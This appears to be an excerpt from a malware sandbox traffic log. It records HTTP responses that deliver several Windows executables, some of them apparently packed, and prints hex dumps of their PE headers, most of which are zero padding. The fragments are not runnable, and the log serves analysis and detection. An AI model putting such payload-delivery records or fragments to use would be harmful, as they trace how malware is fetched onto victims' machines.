00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Nov 2024 19:35:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:35:36 GMTContent-Type: application/octet-streamContent-Length: 1881600Last-Modified: Fri, 22 Nov 2024 19:33:15 GMTConnection: keep-aliveETag: "6740dc7b-1cb600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4b 00 00 04 00 00 0c 05 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b6 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 b6 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 90 06 00 00 06 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 b0 06 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 72 77 66 74 67 69 77 00 a0 19 00 00 20 31 00 00 98 19 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 61 6a 67 66 73 78 6c 00 10 00 00 00 c0 4a 00 00 04 00 00 00 90 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4a 00 00 22 00 00 00 94 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:10 GMTContent-Type: application/octet-streamContent-Length: 4419072Last-Modified: Fri, 22 Nov 2024 17:40:31 GMTConnection: keep-aliveETag: "6740c20f-436e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 f0 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 c6 00 00 04 00 00 27 dc 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 da c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 da c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 39 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 67 72 63 64 6a 63 69 00 c0 1b 00 00 20 aa 00 00 bc 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 65 7a 72 61 76 69 76 00 10 00 00 00 e0 c5 00 00 04 00 00 00 48 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 c5 00 00 22 00 00 00 4c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:23 GMTContent-Type: application/octet-streamContent-Length: 1856000Last-Modified: Fri, 22 Nov 2024 19:33:01 GMTConnection: keep-aliveETag: "6740dc6d-1c5200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 d4 df 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 63 6b 67 73 6d 72 69 00 c0 19 00 00 a0 2f 00 00 b4 19 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6f 64 77 61 73 61 71 00 10 00 00 00 60 49 00 00 04 00 00 00 2c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 49 00 00 22 00 00 00 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:32 GMTContent-Type: application/octet-streamContent-Length: 1789440Last-Modified: Fri, 22 Nov 2024 19:33:08 GMTConnection: keep-aliveETag: "6740dc74-1b4e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 24 01 00 00 00 00 00 00 50 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 68 00 00 04 00 00 be 99 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6b 72 6d 71 77 68 6f 00 b0 19 00 00 90 4e 00 00 b0 19 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 78 78 70 76 6d 6d 00 10 00 00 00 40 68 00 00 04 00 00 00 28 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 68 00 00 22 00 00 00 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
